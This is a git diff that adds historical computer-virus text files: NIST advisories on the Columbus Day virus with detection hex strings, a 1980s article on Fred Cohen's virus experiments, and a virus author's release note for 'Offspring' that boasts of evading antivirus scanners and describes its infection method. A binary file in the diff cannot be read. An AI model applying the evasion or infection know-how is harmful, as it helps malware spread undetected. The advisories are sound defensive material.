+        Thanks to Couch, The Professor, PDP-11, Guido Sanchez, Snake Eyes,
+Number Six, Ned, and all of the others around 708 who informed me of this 
+grevious error.  I apologize for any inconvenience, but these bugs just 
+seem to creep in on you.  
+        Hope you enjoy V.C.L.!
+
+
+                      -- Nowhere Man, [NuKE] '92
diff --git a/textfiles.com/virus/nist01.txt b/textfiles.com/virus/nist01.txt
new file mode 100644
index 00000000..fd58b67e
--- /dev/null
+++ b/textfiles.com/virus/nist01.txt
@@ -0,0 +1,105 @@
+
+             Columbus Day Virus: Press Release (21)
+
+
+FOR IMMEDIATE RELEASE:                       Jan Kosko
+Sept. 22, 1989                               301/975-2762
+
+                                             TN-XXXX
+
+
+             COMPUTER SECURITY EXPERTS ADVISE STEPS
+               TO REDUCE THE RISK OF VIRUS ATTACKS
+
+     To reduce the risk of damage from potentially serious
+computer viruses, including one called "Columbus Day," experts at
+the National Institute of Standards and Technology (NIST), the
+National Computer Security Center (NCSC), and the Software
+Engineering Institute (SEI) are recommending several measures plus
+commonsense computing practices.   
+     "This advice is being offered to encourage effective yet calm
+response to recent reports of a new variety of computer virus,"
+says Dennis Steinauer, manager of the computer security management
+and evaluation group at NIST. 
+     While incidents of malicious software attacks are relatively
+few, they have been increasing.  Most recently, a potentially
+serious personal computer virus has been reported.  The virus is
+known by several names, including "Columbus Day," Datacrime and
+"Friday the 13th."  In infected machines it is designed to attack
+the hard-disk data-storage devices of IBM-compatible personal
+computers on or after October 13.   The virus is designed to
+destroy disk file directory information, making the disk's
+contents inaccessible.  (A fact sheet on this virus is attached
+and includes precautionary measures to help prevent damage.) 
+     While the Columbus Day virus has been identified in both the
+United States and Europe, there is no evidence that it has spread
+extensively in this country or that it is inherently any more
+threatening than other viruses, say the computer security experts. 
+     "Computer virus" is a term often used to indicate any self-
+replicating software that can, under certain circumstances,
+destroy information in computers or disrupt networks.  Other
+examples of malicious software are "Trojan horses" and "network
+worms."  Viruses can spread quickly and can cause extensive
+damage.  They pose a larger risk for personal computers which tend
+to have fewer protection features and are often used by non-
+technically-oriented people.  Viruses often are written to
+masquerade as useful programs so that users are duped into copying
+them and sharing them with friends and work colleagues.  
+     Routinely using good computing practices can reduce the
+likelihood of contracting and spreading any virus and can minimize
+its effects if one does strike.  Advice from the experts includes:
+*    Make frequent backups of your data, and keep several
+     versions.
+*    Use only software obtained from reputable and reliable
+     sources.  Be very cautious of software from public sources,
+     such as software bulletin boards, or sent across personal
+     computer networks.            
+*    Don't let others use your computer without your consent.     
+*    Use care when exchanging software between computers at work
+     or between your home computer and your office computer.
+*    Back up new software immediately after installation and use
+     the backup copy whenever you need to restore.  Retain
+     original distribution diskettes in a safe location.
+*    Learn about your computer and the software you use and be
+     able to distinguish between normal and abnormal system
+     activity.
+*    If you suspect your system contains a virus, stop using it
+     and get assistance from a knowledgeable individual.
+     In general, educating users is one of the best, most cost-
+effective steps to take, says Steinauer.  Users should know about
+malicious software in general and the risks that it poses, how to
+use technical controls, monitor their systems and software for
+abnormal activity, and what to do to contain a problem or recover
+from an attack.  "An educated user is the best defense most
+organizations have," he says. 
+     A number of commercial organizations sell software or
+services that may help detect or remove some types of viruses,
+including the Columbus Day virus.  But, says Steinauer, there are
+many types of viruses, and new ones can appear at any time.  "No
+product can guarantee to identify all viruses," he adds.
+     To help deal with various types of computer security threats,
+including malicious software, NIST and others are forming a
+network of computer security response and information centers. 
+These centers are being modeled after the SEI's Computer Emergency
+Response Team Coordination Center, often called CERT, established
+by the Defense Advanced Research Projects Agency (DARPA).  The
+centers will serve as sources of information and guidance on
+viruses and related threats and will respond to computer security
+incidents.
+     In addition, NIST recently has issued guidelines for
+controlling viruses in various computer environments including
+personal computers and networks. 
+     NIST develops security standards for federal agencies and
+security guidelines for unclassified computer systems.  NCSC, a
+component of the National Security Agency, develops guidelines for
+protecting classified (national security) systems.  SEI, a
+research organization funded by DARPA, is located at Carnegie
+Mellon University in Pittsburgh.
+
+
+NOTE:  Computer Viruses and Related Threats:  A Management Guide
+(NIST Special Publication 500-166) is available from
+Superintendent of Documents, U.S. Government Printing Office,
+Washington, D.C. 20402.  Order by stock no. 003-003-02955-6 for
+$2.50 prepaid. Editors and reporters can get a copy from the NIST
+Public Information Division, 301/975-2762.
diff --git a/textfiles.com/virus/nist02.txt b/textfiles.com/virus/nist02.txt
new file mode 100644
index 00000000..aabaedef
--- /dev/null
+++ b/textfiles.com/virus/nist02.txt
@@ -0,0 +1,99 @@
+
+             Columbus Day Virus: A Fact Sheet (22)
+
+
+Sept. 22, 1989
+
+                           FACT SHEET
+
+                   Columbus Day Computer Virus
+
+Several reports of a new computer virus recently have been
+published in the media and throughout the data processing
+community.  This virus has been referred to as "Columbus Day,"
+"Friday the 13th," as well as "Datacrime I" or "Datacrime II." It
+attacks IBM-compatible personal computers running the MS-DOS/PC-
+DOS operating system.  If activated, the virus will destroy disk
+file directory information, making files and their contents
+inaccessible. The following information has been compiled by
+NIST, NCSC, and SEI from several sources and is being made
+available for system managers to use in taking precautionary
+measures.
+
+NOTE: As with many viruses, there may be other, yet unidentified,
+variants with different characteristics.  Therefore, this
+information is not guaranteed to be complete and accurate for all
+possible variants.
+
+NAMES OF VIRUS:  Columbus Day, Friday the 13th, Datacrime I/II
+EFFECT: Performs a low-level format of cylinder zero of the
+hard disk on the target machine, thereby destroying the boot
+sector and File Allocation Table (FAT) information.  Upon
+activation it may display a message similar to the following:
+DATACRIME VIRUS  RELEASED:1 MARCH 1989
+
+TRIGGER: The virus is triggered by a system date 13 October or
+later.  (Note that 13 October 1989 is a Friday.)
+
+CHARACTERISTICS: Several characteristics have been identified:.
+
+1.  The virus, depending on its variant, appends itself to .COM
+files (except for COMMAND.COM), increasing the .COM file by
+either 1168 or 1280 bytes.  In addition, the Datacrime II variant
+can infect .EXE files, increasing their size by 1514 bytes.
+
+2.  The 1168 byte version contains the hex string EB00B40ECD21B4.
+
+3.  The 1280 byte version contains the hex string
+00568DB43005CD21.
+
+This virus reportedly was released on 1 March 1989 in Europe.  It
+is unlikely that significant propagation could occur between the
+release date and mid-October; therefore, U.S. systems should be
+at a low risk for infection.  If safe computing practices have
+been followed, the risk should be practically nil.  However,
+managers believing their site may be at risk should consider
+taking precautionary measures, including one or more of the
+following actions:
+
+1.  Take full back-ups of all hard disks.  If the disks are later
+found to have been infected and attacked by the virus, lost data
+can be recovered from the back-ups.  Operating system and
+application software can be restored from original media.  A full
+low-level disk format should be performed on the infected hard
+disk prior to restoration procedures.
+
+2.  Consider using a commercial utility that can assist in
+restoration of a disk directory and recovery of data.  There are
+a number of such utilities on the market.  Note that these
+utilities normally must be run prior to data loss to enable disk
+and file restoration.
+
+3.  Avoid setting the system date to 13 October or later until
+the systems have been checked for virus presence.
+
+4.  Attempt to determine if the virus is present in one or more
+files through one of the following techniques:
+
+     a.   If original file sizes are known, check for increased
+          sizes as noted above.
+
+     b.   Use DEBUG or other utility to scan .COM and .EXE files
+          for the characteristic hexadecimal strings noted
+          earlier.
+
+     c.   Copy all software to an isolated system and set the
+          system date to 13 October or later and run several
+          programs to see if the virus is triggered.  If
+          activation occurs, all other systems will require virus
+          identification and removal.
+
+     d.   Use a virus-detection tool to determine if this (or
+          another) virus is present.
+
+Commercial products intended to detect or remove various computer
+viruses are available from several sources.  However, these
+products are not formally reviewed or evaluated; thus, they are
+not listed here.  The decision to use such products is the
+responsibility of each user or organization.
+
diff --git a/textfiles.com/virus/offspr82.txt b/textfiles.com/virus/offspr82.txt
new file mode 100644
index 00000000..94f94fc1
--- /dev/null
+++ b/textfiles.com/virus/offspr82.txt
@@ -0,0 +1,36 @@
+
+����������������������������������������Ŀ
+� OFFSPRING v0.82 - By Virogen - 09/06/93�
+������������������������������������������
+
+  Yea yea here is Offspring v0.82 .. this really isn't a release which
+  involved much change as far as coding goes. Mcafee's SCAN has been
+  detecting this virus as 'Trident' which is obviously a complete
+  screw up since this viruses encryption is not anything like TPE.
+  Actually, SCANv107 adds 'OFFSpring' to it's list of detectable
+  viruses. I don't know what version he got , but it doesn't detect
+  any current version as [OFFS]. Regardless as what it detects as, I
+  just couldn't live with one of my viruses being detected by his shitass
+  scanner.   So new in this version is:
+
+  v0.82 - No longer detectable by SCAN as anything.
+          No longer detectable by TBAV heuristics.
+
+
+  Type : PSRhA  - Parastic & Spawning Resident  - Encrypting
+  Origin : Virogen's Drunken Programming Inc.
+  Eff. Length : 1134-1184
+
+  Infection Method :  Once memory resident, the virus infects up to five
+                     files in the current directory everytime a file
+                     is execucted. Anyway, it will first infect EXE files
+                     (spawning) in directory, once all the EXE files have
+                     been infected, it moves to COM files (parastic).
+
+
+
+                                   Your Faithful Comrad,
+                                           Virogen
+
+
+
diff --git a/textfiles.com/virus/p1.txt b/textfiles.com/virus/p1.txt
new file mode 100644
index 00000000..d3ae1d48
--- /dev/null
+++ b/textfiles.com/virus/p1.txt
@@ -0,0 +1,186 @@
+
+
+* <CTRL K> OR <CTRL X> ABORTS <CTRL S> SUSPENDS *
+   SECURITY EXPERTS ARE AFRAID THAT SABOTEURS COULD
+  INFECT COMPUTERS WITH A "VIRUS" THAT WOULD REMAIN
+  LATENT FOR MONTHS OR EVEN YEARS, AND THEN CAUSE
+  CHAOS.
+
+
+
+
+                   ATTACK OF THE COMPUTER VIRUS
+                 --------------------------------
+
+                                      BY LEE DEMBART
+
+
+
+  GERM WARFARE-THE DELIBERATE RELEASE OF DEADLY BACTERIA OR VIRUSES-IS A
+PRACTICE SO ABHORRENT THAT IT HAS LONG BEEN OUTLAWED BY INTERNATIONAL TREATY.
+YET COMPUTER SCIENTISTS ARE CONFRONTING THE POSSIBILITY THAT SOMETHING AKIN TO
+GERM WARFARE COULD BE USED TO DISABLE THEIR LARGEST MACHINES. IN A
+CIVILIZATION EVER MORE DEPENDENT ON COMPUTERS, THE RESULTS COULD BE DISASTROUS
+-THE SUDDEN SHUTDOWN OF AIR TRAFFIC CONTROL SYSTEMS, FINANCIAL NETWORKS, OR
+FACTORIES, FOR EXAMPLE, OR THE WHOLESALE DESTRUCTION OF GOVERNMENT OR BUSINESS
+MORE: [Y]ES,(N)O,(NS)NON-STOP? ns
+RECORDS.
+
+  THE WARNING HAS BEEN RAISED BY A UNIVERSITY OF SOUTHERN CALIFORNIA RESEARCHER
+WHO FIRST DESCRIBED THE PROBLEM IN SEPTEMBER, BEFORE TWO CONFERENCES ON
+COMPUTER SECURITY. RESEARCH BY GRADUATE STUDENT FRED COHEN, 28, SHOWS THAT IT
+IS POSSIBLE TO WRITE A TYPE OF COMPUTER PROGRAM, WHIMSICALLY CALLED A VIRUS,
+THAT CAN INFILTRATE AND ATTACK A COMPUTER SYSTEM IN MUCH THE SAME WAY A REAL
+VIRUS INFECTS A HUMAN BEING. SLIPPED INTO A COMPUTER BY SOME CLEVER SABOTEUR,
+THE VIRUS WOULD SPREAD THROUGHOUT THE SYSTEM WHILE REMAINING HIDDEN FROM IT'S
+OPERATORS. THEN, AT SOME TIME MONTHS OR YEARS LATER, THE VIRUS WOULD EMERGE
+WITHOUT WARNING TO CRIPPLE OR SHUT DOWN ANY INFECTED MACHINE.
+
+  THE POSSIBILITY HAS COMPUTER SECURITY EXPERTS ALARMED BECAUSE, AS COHEN
+WARNS, THE PROGRAMMING NECESSARY TO CREATE THE SIMPLEST FORMS OF COMPUTER
+VIRUS IS NOT PARTICULARLY DIFFICULT. "VIRAL ATTACKS APPEAR TO BE EASY TO
+DEVELOP IN A SHORT TIME," HE TOLD A CONFERENCE CO-SPONSORED BY THE NATIONAL
+BUREAU OF STANDARDS AND THE DEPARTMENT OF DEFENSE. "[THEY] CAN BE DESIGNED TO
+LEAVE FEW IF ANY TRACES IN MOST CURRENT SYSTEMS, ARE EFFECTIVE AGAINST MODERN
+SECURITY POLICIES, AND REQUIRE ONLY MINIMAL EXPERTISE TO IMPLEMENT."
+
+  COMPUTER VIRUSES ARE APTLY NAMED; THEY SHARE SEVERAL INSIDIOUS FEATURES WITH
+BIOLOGICAL VIRUSES. REAL VIRUSES BURROW INTO LIVING CELLS AND TAKE OVER THEIR
+HOSTS' MACHINERY TO MAKE MULTIPLE COPIES OF THEMSELVES. THESE COPIES ESCAPE TO
+INFECT OTHER CELLS. USUALLY INFECTED CELLS DIE. A COMPUTER VIRUS IS A TINY
+COMPUTER PROGRAM THAT "INFECTS" OTHER PROGRAMS IN MUCH THE SAME WAY. THE VIRUS
+ONLY OCCUPIES A FEW HUNDRED BYTES OF MEMORY; A TYPICAL MAINFRAME PROGRAM, BY
+CONTRAST, TAKES UP HUNDREDS OF THOUSANDS. THUS, WHEN THE VIRUS IS INSERTED INTO
+AN ORDINARY PROGRAM, ITS PRESENCE GOES UNNOTICED BY COMPUTER OPERATORS OR
+TECHNICIANS.
+
+  THEN, EACH TIME THE "HOST" PROGRAM RUNS, THE COMPUTER AUTOMATICALLY EXECUTES
+THE INSTRUCTIONS OF THE VIRUS-JUST AS IF THEY WERE PART OF THE MAIN PROGRAM. A
+TYPICAL VIRUS MIGHT CONTAIN THE FOLLOWING INSTRUCTIONS: "FIRST, SUSPEND
+EXECUTION OF THE HOST PROGRAM TEMPORARILY.  NEXT, SEARCH THE COMPUTER'S MEMORY
+FOR OTHER LIKELY HOST PROGRAMS THAT HAVE NOT BEEN ALREADY INFECTED. IF ONE IS
+FOUND, INSERT A COPY OF THESE INSTRUCTIONS INTO IT.  FINALLY, RETURN CONTROL
+OF THE COMPUTER TO THE HOST PROGRAM."
+
+  THE ENTIRE SEQUENCE OF STEPS TAKES A HALF A SECOND OR LESS TO COMPLETE, FAST
+ENOUGH SO THAT NO ON WILL BE AWARE THAT IT HAS RUN. AND EACH NEWLY INFECTED
+HOST PROGRAM HELPS SPREAD THE CONTAGION EACH TIME IT RUNS, SO THAT EVENTUALLY
+EVERY PROGRAM IN THE MACHINE IS CONTAMINATED.
+
+  THE VIRUS CONTINUES TO SPREAD INDEFINITELY, EVEN INFECTING OTHER COMPUTERS
+WHENEVER A CONTAMINATED PROGRAM IN TRANSMITTED TO THEM. THEN, ON A PARTICULAR
+DATE OR WHEN CERTAIN PRESET CONDITIONS ARE MET, THE VIRUS AND ALL IT'S CLONES
+GO ON THE ATTACK. AFTER THAT, EACH TIME AN INFECTED PROGRAM IS RUN, THE VIRUS
+DISRUPTS THE COMPUTER'S OPERATIONS BY DELETING FILES, SCRAMBLING THE MEMORY,
+TURNING OFF THE POWER, OR MAKING OTHER MISCHIEF.
+
+  THE SABOTEUR NEED NOT BE AROUND TO GIVE THE SIGNAL TO ATTACK. A DISGRUNTLED
+EMPLOYEE WHO WAS AFRAID OF GETTING FIRED, FOR EXAMPLE, MIGHT PLOT HIS REVENGE
+IN ADVANCE BY ADDING AN INSTRUCTION TO HIS VIRUS THAT CAUSED IT TO REMAIN
+DORMANT ONLY SO LONG AS HIS PERSONAL PASSWORD WAS LISTED IN THE SYSTEM. THEN,
+SAYS COHEN, "AS SOON AS HE WAS FIRED AND THE PASSWORD WAS REMOVED, NOTHING
+WOULD WORK ANY MORE."
+
+  THE FACT THAT THE VIRUS REMAINS HIDDEN AT FIRST IS WHAT MAKES IT SO
+DANGEROUS. "SUPPOSE YOUR VIRUS ATTACKED BY DELETING FILES IN THE SYSTEM,"
+COHEN SAYS. "IF IT STARTED DOING THAT RIGHT AWAY, THEN AS SOON AS YOUR FILES
+GOT INFECTED THEY WOULD START TO DISAPPEAR AND YOU'D SAY 'HEY, SOMETHING'S
+WRONG HERE.' YOU'D PROBABLY BE ABLE TO IDENTIFY WHOEVER DID IT." TO AVOID
+EARLY DETECTION OF THE VIRUS, A CLEVER SABOTEUR MIGHT ADD INSTRUCTIONS TO THE
+VIRUS PROGRAM THAT WOULD CAUSE IT TO CHECK THE DATE EACH TIME IT RAN, AND
+ATTACK ONLY IF THE DATE WAS IDENTICAL -OR LATER THAN- SOME DATE MONTHS OR
+YEARS IN THE FUTURE. "THEN," SAYS COHEN, "ONE DAY, EVERYTHING WOULD STOP. EVEN
+IF THEY TRIED TO REPLACE THE INFECTED PROGRAMS WITH PROGRAMS THAT HAD BEEN
+STORED ON BACK-UP TAPES, THE BACK-UP COPIES WOULDN'T WORK EITHER - PROVIDED
+THE COPIES WERE MADE AFTER THE SYSTEM WAS INFECTED.
+
+  THE IDEA OF VIRUS-LIKE PROGRAMS HAS BEEN AROUND SINCE AT LEAST 1975, WHEN THE
+SCIENCE FICTION WRITER JOHN BRUNNER INCLUDED ONE IN HIS NOVEL `THE SHOCKWAVE
+RIDER'. BRUNNER'S "TAPEWORM" PROGRAM RAN LOOSE THROUGH THE COMPUTER NETWORK,
+GOBBLING UP COMPUTER MEMORY IN ORDER TO DUPLICATE ITSELF. "IT CAN'T BE
+KILLED," ONE CHARACTER IN THE BOOK EXCLAIMS IN DESPERATION. "IT'S
+INDEFINITELY SELF-PERPETUATING AS LONG AS THE NETWORK EXISTS."
+
+  IN 1980, JOHN SHOCH AT THE XEROX PALO ALTO RESEARCH CENTER DEVISED A
+REAL-LIFE PROGRAM THAT DID SOMEWHAT THE SAME THING. SHOCH'S CREATION, CALLED A
+WORM, WRIGGLED THROUGH A LARGE COMPUTER SYSTEM LOOKING FOR MACHINES THAT WERE
+NOT BEING USED AND HARNESSING THEM TO HELP SOLVE A LARGE PROBLEM. IT COULD
+TAKE OVER AN ENTIRE SYSTEM. MORE RECENTLY, COMPUTER SCIENTISTS HAVE AMUSED
+THEMSELVES WITH A GLADIATORIAL COMBAT, CALLED CORE WAR, THAT RESEMBLES A
+CONTROLLED VIRAL ATTACK. SCIENTISTS PUT TWO PROGRAMS IN THE SAME COMPUTER,
+EACH DESIGNED TO CHASE THE OTHER AROUND THE MEMORY, TRYING TO INFECT AND KILL
+THE RIVAL.
+
+  INSPIRED BY EARLIER EFFORTS LIKE THESE, COHEN TOOK A SECURITY COURSE LAST
+YEAR, AND THEN SET OUT TO TEST WHETHER VIRUSES COULD ACTUALLY DO HARM TO A
+COMPUTER SYSTEM. HE GOT PERMISSION TO TRY HIS VIRUS AT USC ON A VAX COMPUTER
+WITH A UNIX OPERATING SYSTEM, A COMBINATION USED BY MANY UNIVERSITIES AND
+COMPANIES. (AN OPERATING SYSTEM IS THE MOST BASIC LEVEL OF PROGRAMMING IN A
+COMPUTER; ALL OTHER PROGRAMS USE THE OPERATING SYSTEM TO ACCOMPLISH BASIC
+TASKS LIKE RETRIEVING INFORMATION FROM MEMORY, OR SENDING IT TO A SCREEN.)
+
+  IN FIVE TRIAL RUNS, THE VIRUS NEVER TOOK MORE THAN AN HOUR TO PENETRATE THE
+ENTIRE SYSTEM. THE SHORTEST TIME TO FULL INFECTION WAS FIVE MINUTES, THE
+AVERAGE HALF AN HOUR. IN FACT, THE TRIAL WAS SO SUCCESSFUL THAT UNIVERSITY
+OFFICIALS REFUSED TO ALLOW COHEN TO PERFORM FURTHER EXPERIMENTS. COHEN
+UNDERSTANDS THEIR CAUTION, BUT CONSIDERS IT SHORTSIGHTED. "THEY'D RATHER BE
+PARANOID THAN PROGRESSIVE," HE SAYS. "THEY BELIEVE IN SECURITY THROUGH
+OBSCURITY."
+
+  COHEN NEXT GOT A CHANCE TO TRY OUT HIS VIRUSES ON A PRIVATELY OWNED UNIVAC
+1108. (THE OPERATORS HAVE ASKED THAT THE COMPANY NOT BE IDENTIFIED.) THIS
+COMPUTER SYSTEM HAD AN OPERATING SYSTEM DESIGNED FOR MILITARY SECURITY; IT WAS
+SUPPOSED TO ALLOW PEOPLE WITH LOW-LEVEL SECURITY CLEARANCE TO SHARE A COMPUTER
+WITH PEOPLE WITH HIGH-LEVEL CLEARANCE WITHOUT LEAKAGE OF DATA. BUT THE
+RESTRICTIONS AGAINST DATA FLOW DID NOT PREVENT COHEN'S VIRUS FROM SPREADING
+THROUGHOUT THE SYSTEM - EVEN THOUGH HE ONLY INFECTED A SINGLE LOW-SECURITY
+LEVEL SECURITY USER. HE PROVED THAT MILITARY COMPUTERS, TOO, MAY BE
+VULNERABLE, DESPITE THEIR SAFEGUARDS.
+
+  THE PROBLEM OF VIRAL SPREAD IS COMPOUNDED BY THE FACT THAT COMPUTER USERS
+OFTEN SWAP PROGRAMS WITH EACH OTHER, EITHER BY SHIPPING THEM ON TAPE OR DISK
+OR SENDING THEM OVER A TELEPHONE LINE OR THROUGH A COMPUTER NETWORK. THUS, AN
+INFECTION THAT ORIGINATES IN ONE COMPUTER COULD EASILY SPREAD TO OTHERS OVER
+TIME - A HAZARD THAT MAY BE PARTICULARLY SEVERE FOR THE BANKING INDUSTRY, WHERE
+INFORMATION IS CONSTANTLY BEING EXCHANGED BY WIRE. SAYS COHEN, "THE DANGER IS
+THAT SOMEBODY WILL WRITE VIRUSES THAT ARE BAD ENOUGH TO GET AROUND THE
+FINANCIAL INSTITUTIONS AND STOP THEIR COMPUTERS FROM WORKING."
+
+  MANY SECURITY PROFESSIONALS ALSO FIND THIS PROSPECT FRIGHTENING. SAYS JERRY
+LOBEL, MANAGER OF COMPUTER SECURITY AT HONEYWELL INFORMATION SYSTEMS IN
+PHOENIX, "FRED CAME UP WITH ONE OF THE MORE DEVIOUS KINDS OF PROBLEMS AGAINST
+WHICH WE HAVE VERY FEW DEFENSES AT PRESENT." LOBEL, WHO ORGANIZED A RECENT
+SECURITY CONFERENCE SPONSORED BY THE INTERNATIONAL FEDERATION FOR INFORMATION
+PROCESSING -AT WHICH COHEN ALSO DELIVERED A PAPER- CITES OTHER POTENTIAL
+TARGETS FOR ATTACK: "IF IT WERE AN AIR TRAFFIC CONTROL SYSTEM OR A PATIENT
+MONITORING SYSTEM IN A HOSPITAL, IT WOULD BE A DISASTER."
+
+  MARVIN SCHAEFER, CHIEF SCIENTIST AT THE PENTAGON'S COMPUTER SECURITY CENTER,
+SAYS THE MILITARY HAS BEEN CONCERNED ABOUT PENETRATION BY VIRUS-LIKE PROGRAMS
+FOR YEARS. DEFENSE PLANNERS HAVE PROTECTED SOME TOP-SECRET COMPUTERS BY
+ISOLATING THEM, JUST AS A DOCTOR MIGHT ISOLATE A PATIENT TO KEEP HIM FROM
+CATCHING COLD. THE MILITARY'S MOST SECRET COMPUTERS ARE OFTEN KEPT IN
+ELECTRONICALLY SHIELDED ROOMS AND CONNECTED TO EACH OTHER, WHEN NECESSARY, BY
+WIRES THAT RUN THROUGH PIPES CONTAINING GAS UNDER PRESSURE. SHOULD ANYONE TRY
+TO PENETRATE THE PIPES IN ORDER TO TAP INTO THE WIRES, THE DROP IN GAS
+PRESSURE WOULD IMMEDIATELY GIVE HIM AWAY. BUT, SCHAEFER ADMITS, "IN SYSTEMS
+THAT DON'T HAVE GOOD ACCESS CONTROLS, THERE REALLY IS NO WAY TO CONTAIN A
+VIRUS. IT'S QUITE POSSIBLE FOR AN ATTACK TO TAKE OVER A MACHINE."
+
+  HONEYWELL'S LOBEL STRONGLY BELIEVES THAT NEITHER COHEN NOR ANY OTHER
+RESPONSIBLE EXPERT SHOULD EVEN OPEN A PUBLIC DISCUSSION OF COMPUTER VIRUSES.
+"IT ONLY TAKES A HALFWAY DECENT PROGRAMMER ABOUT HALF A DAY OF THINKING TO
+FIGURE OUT HOW TO DO IT," LOBEL SAYS. "IF YOU TELL ENOUGH PEOPLE ABOUT IT,
+THERE'S GOING TO BE ONE CRAZY ENOUGH OUT THERE WHO'S GOING TO TRY."
+
+  COHEN DISAGREES, INSISTING THAT IT IS MORE DANGEROUS `NOT' TO DISCUSS AND
+STUDY COMPUTER VIRUSES. "THE POINT OF THESE EXPERIMENTS," HE SAYS, "IS THAT IF
+I CAN FIGURE OUT HOW TO DO IT, SOMEBODY ELSE CAN TOO. IT'S BETTER TO HAVE
+SOMEBODY FRIENDLY DO THE EXPERIMENT, TELL YOU HOW BAD IT IS, SHOW YOU HOW IT
+WORKS AND HELP YOU COUNTERACT IT, THAN TO HAVE SOMEBODY VICIOUS COME ALONG AND
+DO IT." IF YOU WAIT FOR THE BAD GUYS TO CREATE A VIRUS FIRST, COHEN SAYS, THEN
+BY THE TIME YOU FIND OUT ABOUT IT, IT WILL BE TOO LATE.
+
+ 11 MINUTES LEFT
+
+BULLETIN # 1 THRU 32, L)IST, PRESS [ENTER] TO CONTINUE? 
\ No newline at end of file
diff --git a/textfiles.com/virus/pcblkjck.txt b/textfiles.com/virus/pcblkjck.txt
new file mode 100644
index 0000000000000000000000000000000000000000..9508c07f70728e020e5a85e47fdd8b2f9b18ef09
GIT binary patch
literal 4608
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
